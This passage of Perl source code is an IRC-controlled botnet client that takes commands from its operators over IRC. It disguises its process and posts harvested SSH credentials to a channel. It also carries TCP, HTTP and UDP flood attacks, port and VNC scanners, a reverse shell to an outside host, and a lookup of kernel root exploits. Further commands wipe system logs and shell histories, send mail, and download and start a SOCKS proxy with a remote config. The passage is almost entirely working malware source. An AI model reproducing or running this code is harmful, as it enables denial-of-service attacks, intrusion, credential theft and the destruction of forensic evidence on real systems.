  51 | $0="$hidden"."\0"x16;;
  52 | my $pid=fork;
  53 | exit if $pid;
  54 | die "fork problem: $!" unless defined($pid);
  55 | ###########################################################
  56 | ####################[lets start..]#########################
  57 | ###########################################################
  58 | ####################[Connecting...]########################
  59 | ###########################################################
  60 | our %irc_servers;
  61 | our %DCC;
  62 | my $dcc_sel = new IO::Select->new();
  63 | 
  64 | $sel_cliente = IO::Select->new();
  65 | sub sendraw {
  66 |   if ($#_ == '1') {
  67 |     my $socket = $_[0];
  68 |     print $socket "$_[1]\n";
  69 |   } else {
  70 |       print $IRC_cur_socket "$_[0]\n";
  71 |   }
  72 | }
  73 | 
  74 | sub conectar {
  75 |    my $meunick = $_[0];
  76 |    my $server_con = $_[1];
  77 |    my $port_con = $_[2];
  78 | 
  79 |    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con", PeerPort=>$port_con) or return(1);
  80 |    if (defined($IRC_socket)) {
  81 |      $IRC_cur_socket = $IRC_socket;
  82 | 
  83 |      $IRC_socket->autoflush(1);
  84 |      $sel_cliente->add($IRC_socket);
  85 | 
  86 |      $irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
  87 |      $irc_servers{$IRC_cur_socket}{'port'} = "$port_con";
  88 |      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  89 |      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  90 |      nick("$meunick");
  91 |      sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
  92 |      sleep 1;
  93 |    }
  94 | }
  95 | my $line_temp;
  96 | while( 1 ) {
  97 |    while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
  98 |    delete($irc_servers{''}) if (defined($irc_servers{''}));
  99 |    my @ready = $sel_cliente->can_read(0);
 100 |    next unless(@ready);
 101 |    foreach $fh (@ready) {
 102 |      $IRC_cur_socket = $fh;
 103 |      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
 104 |      $nread = sysread($fh, $msg, 4096);
 105 |      if ($nread == 0) {
 106 |         $sel_cliente->remove($fh);
 107 |         $fh->close;
 108 |         delete($irc_servers{$fh});
 109 |      }
 110 |      @lines = split (/\n/, $msg);
 111 | 
 112 |      for(my $c=0; $c<= $#lines; $c++) {
 113 |        $line = $lines[$c];
 114 |        $line=$line_temp.$line if ($line_temp);
 115 |        $line_temp='';
 116 |        $line =~ s/\r$//;
 117 |        unless ($c == $#lines) {
 118 |          parse("$line");
 119 |        } else {
 120 |            if ($#lines == 0) {
 121 |              parse("$line");
 122 |            } elsif ($lines[$c] =~ /\r$/) {
 123 |                parse("$line");
 124 |            } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
 125 |                parse("$line");
 126 |            } else {
 127 |                $line_temp = $line;
 128 |            }
 129 |        }
 130 |       }
 131 |    }
 132 | }
 133 | ###########################################################
 134 | ####################[Connecting...]########################
 135 | ###########################################################
 136 | ####################[..Connected..]########################
 137 | ###########################################################
 138 | sub parse {
 139 |    my $servarg = shift;
 140 |    if ($servarg =~ /^PING \:(.*)/) {
 141 |      sendraw("PONG :$1");
 142 |    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
 143 |        my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
 144 |        if ($args =~ /^\001VERSION\001$/) {
 145 |          notice("$pn", "\001VERSION Legend IRC [2010]\001");
 146 |        }
 147 |        if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
 148 |        if (grep {$_ =~ /^\Q$pn\E$/i } @admins) {
 149 |          if ($onde eq "$meunick"){
 150 |            shell("$pn", "$args");
 151 |          }
 152 |          if ($args =~ /^(\Q$meunick\E|\!legend)\s+(.*)/ ) {
 153 |             my $natrix = $1;
 154 |             my $arg = $2;
 155 |             if ($arg =~ /^\!(.*)/) {
 156 |               ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
 157 |             } elsif ($arg =~ /^\@(.*)/) {
 158 |                 $ondep = $onde;
 159 |                 $ondep = $pn if $onde eq $meunick;
 160 |                 bfunc("$ondep","$1");
 161 |             } else {
 162 |                 shell("$onde", "$arg");
 163 |             }
 164 |          } 
 165 |        }
 166 | 	}
 167 |    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
 168 |        if (lc($1) eq lc($meunick)) {
 169 |          $meunick=$4; 
 170 |          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
 171 |        }
 172 |    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
 173 |        nick("$meunick-".int rand(9999999));
 174 |    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
 175 |        $meunick = $2;
 176 |        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
 177 |        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
 178 |        foreach my $channel (@channels) {
 179 |          sendraw("JOIN $channel sexy");
 180 | 	 sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Hostname: $sshhost Username: $sshuser Password $sshpass2:.4");
 181 |        }
 182 |    }
 183 | }
 184 | 
 185 | ###########################################################
 186 | ####################[..Functions..]########################
 187 | ###########################################################
 188 | 
 189 | sub bfunc {
 190 |   my $printl = $_[0];
 191 |   my $funcarg = $_[1];
 192 |   if (my $pid = fork) {
 193 |      waitpid($pid, 0);
 194 |   } else {
 195 |       if (fork) {
 196 |          exit;
 197 |        } else {
 198 | 
 199 | ###########################################################
 200 | ######################[..@system..]########################
 201 | ###########################################################
 202 | 
 203 |          if ($funcarg =~ /^system/) {
 204 |             $uname=`uname -a`;
 205 |             $uptime=`uptime`;
 206 |             $ownd=`pwd`;
 207 |             $distro=`cat /etc/issue`;
 208 |             $id=`id`;
 209 |             $un=`uname -sro`;
 210 |             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4");
 211 |             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uname -a: 14 $uname");
 212 |             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Uptime: 14 $uptime");
 213 |             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Process: 14 $hidden");
 214 |             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2ID: 14 $id");
 215 |             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2Dir: 14 $ownd");
 216 |             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4System Info2:.4 2OS: 14 $distro");
 217 |          }
 218 | 
 219 | ###########################################################
 220 | ######################[..@system..]########################
 221 | ###########################################################
 222 | 
 223 | ###########################################################
 224 | ######################[.@portscan.]########################
 225 | ###########################################################
 226 | 
 227 |          if ($funcarg =~ /^portscan (.*)/) {
 228 |             my $hostip="$1";
 229 |             @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
 230 |             my (@aberta, %porta_banner);
 231 |             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Scanning for open ports on ".$1." 12 started .");
 232 |             foreach my $porta (@portas)  {
 233 |                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
 234 |                   'tcp', Timeout => 4);
 235 |                if ($scansock) {
 236 |                   push (@aberta, $porta);
 237 |                   $scansock->close;
 238 |                }
 239 |             }
 240 |  
 241 |             if (@aberta) {
 242 |                sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 Open ports founded: @aberta");
 243 |             } else {
 244 |                sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Port Scan2:.4 No open ports foundend.");
 245 |             }
 246 |          }
 247 | 
 248 | ###########################################################
 249 | ######################[.@portscan.]########################
 250 | ###########################################################
 251 | 
 252 | ###########################################################
 253 | ######################[.@tcpflood.]########################
 254 | ###########################################################
 255 | 
 256 |            if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
 257 |  sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:.4 TCP Attacking14 ".$1.":".$2." 2for4 ".$3." 2seconds.");
 258 | 	     my $itime = time;
 259 | 	     my ($cur_time);
 260 |              $cur_time = time - $itime;
 261 | 	     while ($3>$cur_time){
 262 |              $cur_time = time - $itime;
 263 | 	     &tcpflooder("$1","$2","$3");
 264 |              }
 265 | 	     sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4TCP2:. 4TCP Attack done 14".$1.":".$2.".");
 266 |            }
 267 | 
 268 | ###########################################################
 269 | ######################[.@tcpflood.]########################
 270 | ###########################################################
 271 | 
 272 | ###########################################################
 273 | #####################[.@httpflood.]########################
 274 | ###########################################################
 275 | 
 276 |            if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
 277 | 	     sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking14 ".$1." 4for4 ".$2." 2seconds.");
 278 | 	     my $itime = time;
 279 | 	     my ($cur_time);
 280 |              $cur_time = time - $itime;
 281 | 	     while ($2>$cur_time){
 282 |              $cur_time = time - $itime;
 283 | 	     my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
 284 |              print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
 285 | 	     close($socket);
 286 |              }
 287 | 	     sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4HTTP2:. 4HTTP Attacking done ".$1.".");
 288 |            }
 289 | ###########################################################
 290 | #####################[.@httpflood.]########################
 291 | ###########################################################
 292 | 
 293 | ###########################################################
 294 | ######################[.@sqlflood.]########################
 295 | ###########################################################
 296 | 
 297 | if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) {
 298 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking 4 ".$1." 14 on port 3306 for 4 ".$2." 2 seconds .");
 299 | my $itime = time;
 300 | my ($cur_time);
 301 | $cur_time = time - $itime;
 302 | while ($2>$cur_time){
 303 | $cur_time = time - $itime;
 304 |    my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
 305 |    print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
 306 | close($socket);
 307 | }
 308 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4SQL2:.4 Attacking done 14 ".$1.".");
 309 | }
 310 | 
 311 | ###########################################################
 312 | ######################[.@sqlflood.]########################
 313 | ###########################################################
 314 | 
 315 | ###########################################################
 316 | ######################[.@udpflood.]########################
 317 | ###########################################################
 318 |            if ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
 319 |              sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Attacking14 ".$1." 4with2 ".$2." 2KB(s) for4 ".$3." 2seconds.");
 320 |              my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
 321 |              $dtime = 1 if $dtime == 0;
 322 |              my %bytes;
 323 |              $bytes{igmp} = $2 * $pacotes{igmp};
 324 |              $bytes{icmp} = $2 * $pacotes{icmp};
 325 |              $bytes{o} = $2 * $pacotes{o};
 326 |              $bytes{udp} = $2 * $pacotes{udp};
 327 |              $bytes{tcp} = $2 * $pacotes{tcp};
 328 |              sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP2:.4 UDP Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1.".");
 329 |            }
 330 | ###########################################################
 331 | ######################[.@udpflood.]########################
 332 | ###########################################################
 333 | 
 334 | ###########################################################
 335 | ######################[.@udp2flood.]########################
 336 | ###########################################################
 337 |            if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)\s+(\d+)/) {
 338 |              sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP22:.4 UDP2 Attacking14 ".$1.":".$4." 2with4 ".$2." 2KB(s) for4 ".$3." 2seconds.");
 339 |              my ($dtime, %pacotes) = udpflooder2("$1", "$2", "$3","$4");
 340 |              $dtime = 1 if $dtime == 0;
 341 |              my %bytes;
 342 |              $bytes{igmp} = $2 * $pacotes{igmp};
 343 |              $bytes{icmp} = $2 * $pacotes{icmp};
 344 |              $bytes{o} = $2 * $pacotes{o};
 345 |              $bytes{udp} = $2 * $pacotes{udp};
 346 |              $bytes{tcp} = $2 * $pacotes{tcp};
 347 |              sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4UDP22:.4 UDP2 Sent14 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 2Kb in4 ".$dtime." 2seconds to ".$1.".");
 348 |            }
 349 | ############################################################
 350 | 
 351 | 
 352 | ###########################################################
 353 | ######################[.@cleanlogs.]#######################
 354 | ###########################################################
 355 | 
 356 | if ($funcarg =~ /^cleanlogs/) {
 357 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 This process can be long2,4 just wait2!");
 358 |     system 'rm -rf /var/log/lastlog';
 359 |     system 'rm -rf /var/log/wtmp';
 360 |    system 'rm -rf /etc/wtmp';
 361 |    system 'rm -rf /var/run/utmp';
 362 |    system 'rm -rf /etc/utmp';
 363 |    system 'rm -rf /var/log';
 364 |    system 'rm -rf /var/logs';
 365 |    system 'rm -rf /var/adm';
 366 |    system 'rm -rf /var/apache/log';
 367 |    system 'rm -rf /var/apache/logs';
 368 |    system 'rm -rf /usr/local/apache/log';
 369 |    system 'rm -rf /usr/local/apache/logs';
 370 |    system 'rm -rf /root/.bash_history';
 371 |    system 'rm -rf /root/.ksh_history';
 372 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 All default log and bash_history files erased");
 373 |       sleep 1;
 374 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Now Erasing the rest of the machine log files");
 375 |    system 'find / -name *.bash_history -exec rm -rf {} \;';
 376 |    system 'find / -name *.bash_logout -exec rm -rf {} \;';
 377 |    system 'find / -name "log*" -exec rm -rf {} \;';
 378 |    system 'find / -name *.log -exec rm -rf {} \;';
 379 |       sleep 1;
 380 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Clean Logs2:.14 Done! All logs erased");
 381 |       }
 382 | 
 383 | ###########################################################
 384 | ######################[.@cleanlogs.]#######################
 385 | ###########################################################
 386 | 
 387 | ###########################################################
 388 | ########################[..@back..]########################
 389 | ###########################################################
 390 | 
 391 |          if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
 392 |             my $host = "$1";
 393 |             my $porta = "$2";
 394 |             my $proto = getprotobyname('tcp');
 395 |             my $iaddr = inet_aton($host);
 396 |             my $paddr = sockaddr_in($porta, $iaddr);
 397 |             my $shell = "/bin/sh -i";
 398 |             if ($^O eq "MSWin32") {
 399 |                $shell = "cmd.exe";
 400 |             }
 401 |             socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
 402 |             connect(SOCKET, $paddr) or die "connect: $!";
 403 |             open(STDIN, ">&SOCKET");
 404 |             open(STDOUT, ">&SOCKET");
 405 |             open(STDERR, ">&SOCKET");
 406 |             system("$shell");
 407 |             close(STDIN);
 408 |             close(STDOUT);
 409 |             close(STDERR);
 410 |             if ($estatisticas){
 411 |                sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Back Connect2:.14 Connecting to 2 $host:$porta");
 412 |             }
 413 |          }
 414 | 
 415 | ###########################################################
 416 | ########################[..@back..]########################
 417 | ###########################################################
 418 | 
 419 | ###########################################################
 420 | #######################[.@rootable.]#######################
 421 | ###########################################################
 422 | 
 423 | if ($funcarg =~ /^rootable/) { 
 424 | my $khost = `uname -r`;
 425 | my $currentid = `whoami`;
 426 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4r00table2:.14 Currently you are ".$currentid." ");
 427 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4r00table2:.14 The kernel of this box is ".$khost." ");
 428 | chomp($khost);
 429 | 
 430 |    my %h;
 431 |    $h{'w00t'} = { 
 432 |       vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4.16','2.4.20'] 
 433 |    };
 434 |    
 435 |    $h{'brk'} = {
 436 |       vuln=>['2.4.22','2.4.21','2.4.10','2.4.20'] 
 437 |    };
 438 |    
 439 |    $h{'ave'} = {
 440 |       vuln=>['2.4.19','2.4.20'] 
 441 |    };
 442 |    
 443 |    $h{'elflbl'} = {
 444 |       vuln=>['2.4.29'] 
 445 |    };
 446 |    
 447 |    $h{'elfdump'} = {
 448 |       vuln=>['2.4.27']
 449 |    };
 450 |    
 451 |    $h{'expand_stack'} = {
 452 |       vuln=>['2.4.29'] 
 453 |    };
 454 |    
 455 |    $h{'h00lyshit'} = {
 456 |       vuln=>['2.6.8','2.6.10','2.6.11','2.6.9','2.6.7','2.6.13','2.6.14','2.6.15','2.6.16','2.6.2']
 457 |    };
 458 |    
 459 |    $h{'kdump'} = {
 460 |       vuln=>['2.6.13'] 
 461 |    };
 462 |    
 463 |    $h{'km2'} = {
 464 |       vuln=>['2.4.18','2.4.22']
 465 |    };
 466 |    
 467 |    $h{'krad'} = {
 468 |       vuln=>['2.6.11']
 469 |    };
 470 |    
 471 |    $h{'krad3'} = {
 472 |       vuln=>['2.6.11','2.6.9']
 473 |    };
 474 |    
 475 |    $h{'local26'} = {
 476 |       vuln=>['2.6.13']
 477 |    };
 478 |    
 479 |    $h{'loko'} = {
 480 |       vuln=>['2.4.22','2.4.23','2.4.24'] 
 481 |    };
 482 |    
 483 |    $h{'mremap_pte'} = {
 484 |       vuln=>['2.4.20','2.2.25','2.4.24'] 
 485 |    };
 486 |    
 487 |    $h{'newlocal'} = {
 488 |       vuln=>['2.4.17','2.4.19','2.4.18'] 
 489 |    };
 490 |    
 491 |    $h{'ong_bak'} = {
 492 |       vuln=>['2.4.','2.6.'] 
 493 |    };
 494 |    
 495 |    $h{'ptrace'} = {
 496 |       vuln=>['2.2.','2.4.22'] 
 497 |    };
 498 |    
 499 |    $h{'ptrace_kmod'} = {
 500 |       vuln=>['2.4.2'] 
 501 |    };
 502 |    
 503 |    $h{'ptrace24'} = {
 504 |       vuln=>['2.4.9'] 
 505 |    };
 506 |    
 507 |    $h{'pwned'} = {
 508 |       vuln=>['2.4.','2.6.'] 
 509 |    };
 510 |    
 511 |    $h{'py2'} = {
 512 |       vuln=>['2.6.9','2.6.17','2.6.15','2.6.13'] 
 513 |    };
 514 |    
 515 |    $h{'raptor_prctl'} = {
 516 |       vuln=>['2.6.13','2.6.17','2.6.16','2.6.13'] 
 517 |    };
 518 |    
 519 |    $h{'prctl3'} = {
 520 |       vuln=>['2.6.13','2.6.17','2.6.9'] 
 521 |    };
 522 |    
 523 |    $h{'remap'} = {
 524 |       vuln=>['2.4.'] 
 525 |    };
 526 |    
 527 |    $h{'rip'} = {
 528 |       vuln=>['2.2.'] 
 529 |    };
 530 |    
 531 |    $h{'stackgrow2'} = {
 532 |       vuln=>['2.4.29','2.6.10'] 
 533 |    };
 534 |    
 535 |    $h{'uselib24'} = {
 536 |       vuln=>['2.4.29','2.6.10','2.4.22','2.4.25'] 
 537 |    };
 538 |    
 539 |    $h{'newsmp'} = {
 540 |       vuln=>['2.6.'] 
 541 |    };
 542 |    
 543 |    $h{'smpracer'} = {
 544 |       vuln=>['2.4.29'] 
 545 |    };
 546 |    
 547 |    $h{'loginx'} = {
 548 |       vuln=>['2.4.22'] 
 549 |    };
 550 |    
 551 |    $h{'exp.sh'} = {
 552 |       vuln=>['2.6.9','2.6.10','2.6.16','2.6.13'] 
 553 |    };
 554 |    
 555 |    $h{'prctl'} = {
 556 |       vuln=>['2.6.'] 
 557 |    };
 558 |    
 559 |    $h{'kmdx'} = {
 560 |       vuln=>['2.6.','2.4.'] 
 561 |    };
 562 |    
 563 |    $h{'raptor'} = {
 564 |       vuln=>['2.6.13','2.6.14','2.6.15','2.6.16'] 
 565 |    };
 566 |    
 567 |    $h{'raptor2'} = {
 568 |       vuln=>['2.6.13','2.6.14','2.6.15','2.6.16'] 
 569 |    };
 570 |    
 571 | foreach my $key(keys %h){
 572 | foreach my $kernel ( @{ $h{$key}{'vuln'} } ){ 
 573 |    if($khost=~/^$kernel/){
 574 |    chop($kernel) if ($kernel=~/.$/);
 575 |    sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4r00table2:.14 Possible Local Root Exploits: ". $key ." ");
 576 |       }
 577 |    }
 578 | }
 579 | }
 580 | ###########################################################
 581 | #######################[.@rootable.]#######################
 582 | ###########################################################
 583 | 
 584 | ###########################################################
 585 | #######################[.@sendmail.]#######################
 586 | ###########################################################
 587 | 
 588 | if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
 589 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Mailer2:.14  Sending Mail to : 2 $3");
 590 | $subject = $1;
 591 | $sender = $2;
 592 | $recipient = $3;
 593 | @corpo = $4;
 594 | $mailtype = "content-type: text/html";
 595 | $sendmail = '/usr/sbin/sendmail';
 596 | open (SENDMAIL, "| $sendmail -t");
 597 | print SENDMAIL "$mailtype\n";
 598 | print SENDMAIL "Subject: $subject\n";
 599 | print SENDMAIL "From: $sender\n";
 600 | print SENDMAIL "To: $recipient\n\n";
 601 | print SENDMAIL "@corpo\n\n";
 602 | close (SENDMAIL);
 603 | sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Mailer2:.14 Mail Sent To : 2 $recipient");
 604 | }
 605 | 
 606 | ###########################################################
 607 | #######################[.@sendmail.]#######################
 608 | ###########################################################
 609 | 
 610 | ###########################################################
 611 | ########################[.@socks5.]########################
 612 | ###########################################################
 613 | 
 614 | if ($funcarg =~ /^socks5/) {
 615 |    sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Socks52:.14 Installing Mocks please wait4");
 616 |       system 'cd /tmp';
 617 |       system 'wget http://switch.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz';
 618 |       system 'tar -xvfz mocks-0.0.2.tar.gz';
 619 |       system 'rm -rf mocks-0.0.2.tar.gz';
 620 |       system 'cd mocks-0.0.2';
 621 |       system 'rm -rf mocks.conf';
 622 |       system 'curl -O http://andromeda.covers.de/221/mocks.conf';
 623 |       system 'touch mocks.log';
 624 |       system 'chmod 0 mocks.log';
 625 |          sleep(2);
 626 |       system './mocks start';
 627 |          sleep(4);
 628 |       sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Socks52:.14 Looks like its succesfully installed lets do the last things4   ");
 629 | 
 630 |       #lets grab ip
 631 |       $net = `/sbin/ifconfig | grep 'eth0'`;
 632 |       if (length($net))
 633 |       {
 634 |       $net = `/sbin/ifconfig eth0 | grep 'inet addr'`;
 635 |       if (!length($net))
 636 |       {
 637 |       $net = `/sbin/ifconfig eth0 | grep 'inet end.'`;
 638 |       }
 639 |          if (length($net))
 640 |       {
 641 |          chop($net);
 642 |          @netip = split/:/,$net;
 643 |          $netip[1] =~ /(\d{1,3}).(\d{1,3}).(\d{1,3}).(\d{1,3})/;
 644 |          $ip = $1 .".". $2 .".". $3 .".". $4;
 645 |          
 646 |             #and print it ^^   
 647 |             sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Socks52:.14 Connect here :4 ". $ip .":8787 ");
 648 |          }
 649 |       else
 650 |    {
 651 |       sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Socks52:.14 IP not founded ");
 652 |    }
 653 | }
 654 | else
 655 | {
 656 |       sendraw($IRC_cur_socket, "PRIVMSG $printl :12[4@3SocksV512] ERROR WHILE INSTALLING MOCKS ");
 657 | }
 658 | }
 659 | 
 660 | ###########################################################
 661 | ########################[.@socks5.]########################
 662 | ###########################################################
 663 | 
 664 | ###########################################################
 665 | ##########################[.@vnc.]#########################
 666 | 
 667 | ###########################################################
 668 | 
 669 | #r0xb0t 4.6 VNC ScaNNer by ARZ
 670 | if ($funcarg =~ /^vnc\s+(.*)/) {
 671 | my $MAX_SOCKET_TIME = 2;
 672 | my $MAX_CONNECT_TIME = 3;
 673 | #&ftpcheckm($printl);
 674 | my @hosts;
 675 | my $MAX_PROCESSES=100;
 676 | my $host=$1;
 677 | #my $victim=$host;
 678 | sendraw($IRC_cur_socket, "PRIVMSG $printl :_12[_4@_VNC_12] :::: IP Range:_4 $host* ");
 679 | $|=1;
 680 | 
 681 | foreach (0..255) {
 682 | my $pre="$host.$_.";
 683 | foreach (1..255) {
 684 | push(@hosts,$pre.$_);
 685 | }
 686 | }
 687 | 
 688 | my @pids;
 689 | my $npids=0;
 690 | 
 691 | for $victim (@hosts){
 692 | my $pid;
 693 | $pid=fork();
 694 | if($pid>0){
 695 | $npids++;
 696 | if($npids>=$MAX_PROCESSES){
 697 | for(1..($MAX_PROCESSES)){
 698 | $wait_ret=wait();
 699 | if($wait_ret>0){
 700 | $npids--;
 701 | }
 702 | }
 703 | }
 704 | next;
 705 | } elsif(undef $pid) {
 706 | # print "fork error\n" if ($DEBUG);
 707 | exit(0);
 708 | }else{
 709 | my($proto,$port);
 710 | $0="";
 711 | # kill thread on timeout
 712 | local $SIG{'ALRM'} = sub { exit(0); };
 713 | alarm $MAX_SOCKET_TIME;
 714 | my $port=5900;
 715 | print "Connecting to $victim:$port...";
 716 | #$| = 1;
 717 | ($sock = IO::Socket::INET->new(PeerAddr => $victim,PeerPort => $port,Proto => 'tcp',)) ? print "\n": die("\n");
 718 | 
 719 | #negotiate protocol
 720 | $sock->read($protocol_version,12);
 721 | print $sock $protocol_version;
 722 | print "Using protocol $protocol_version";
 723 | $sock->read($security_types,1);
 724 | $sock->read($hahaha,unpack('C',$security_types));
 725 | print $sock "\x01";
 726 | $sock->read($in,4);
 727 | if(unpack('I',$in)) { die("\n") };
 728 | print $sock "\x01";
 729 | $sock->read($in,4);
 730 | (unpack('I',$in)) ?
 731 | sendraw($IRC_cur_socket, "PRIVMSG $printl :_12[_4@_VNC_12] ::::_4 ".$victim." _12is Vulnerable using protocol_4 ".$protocol_version): die("\n");
 732 | 
 733 | exit;
 734 | 
 735 | }
 736 | }
 737 | 
 738 | for(1..$npids){
 739 | my $wt=wait();
 740 | if($wt==-1){
 741 | # print "hey $!\n" if($DEBUG);
 742 | redo;
 743 | }
 744 | }
 745 | sendraw($IRC_cur_socket, "PRIVMSG $printl :_12[_4@_VNC_12] :::: Finished Scan for _4 $host ");
 746 | }
 747 | ###########################################################
 748 | ##########################[.@vnc.]#########################
 749 | 
 750 | ###########################################################
 751 | 
 752 | ###########################################################
 753 | #########################[.@nmap.]#########################
 754 | ###########################################################
 755 | 
 756 |    if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){
 757 |          my $hostip="$1";
 758 |          my $portstart = "$2";
 759 |          my $portend = "$3";
 760 |          my (@abertas, %porta_banner);
 761 |        sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Scanning $1 For Ports:  $2-$3");
 762 |        foreach my $porta ($portstart..$portend){
 763 |                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
 764 |     if ($scansock) {
 765 |                  push (@abertas, $porta);
 766 |                  $scansock->close;
 767 |                  if ($xstats){
 768 |         sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Founded $porta"."/Open");
 769 |                  }
 770 |                }
 771 |              }
 772 |              if (@abertas) {
 773 |         sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 Complete");
 774 |              } else {
 775 |         sendraw($IRC_cur_socket, "PRIVMSG $printl :2.:4Nmap2:.14 No open ports have been founded");
 776 |              }
 777 |           }
 778 | ###########################################################
 779 | #########################[.@nmap.]#########################
 780 | ###########################################################
 781 | 
 782 | 
 783 | 
 784 |            exit;
 785 |        }
 786 |   }
 787 | }
 788 |  
 789 | sub ircase {
 790 |   my ($kem, $printl, $case) = @_;
 791 | 
 792 |   if ($case =~ /^join (.*)/) {
 793 |      j("$1");
 794 |    } 
 795 |    if ($case =~ /^part (.*)/) {
 796 |       p("$1");
 797 |    }
 798 |    if ($case =~ /^rejoin\s+(.*)/) {
 799 |       my $chan = $1;
 800 |       if ($chan =~ /^(\d+) (.*)/) {
 801 |         for (my $ca = 1; $ca <= $1; $ca++ ) {
 802 |           p("$2");
 803 |           j("$2");
 804 |         }
 805 |       } else {
 806 |           p("$chan");
 807 |           j("$chan");
 808 |       }
 809 |    }
 810 |    if ($case =~ /^op/) {
 811 |       op("$printl", "$kem") if $case eq "op";
 812 |       my $oarg = substr($case, 3);
 813 |       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
 814 |    }
 815 |    if ($case =~ /^deop/) {
 816 |       deop("$printl", "$kem") if $case eq "deop";
 817 |       my $oarg = substr($case, 5);
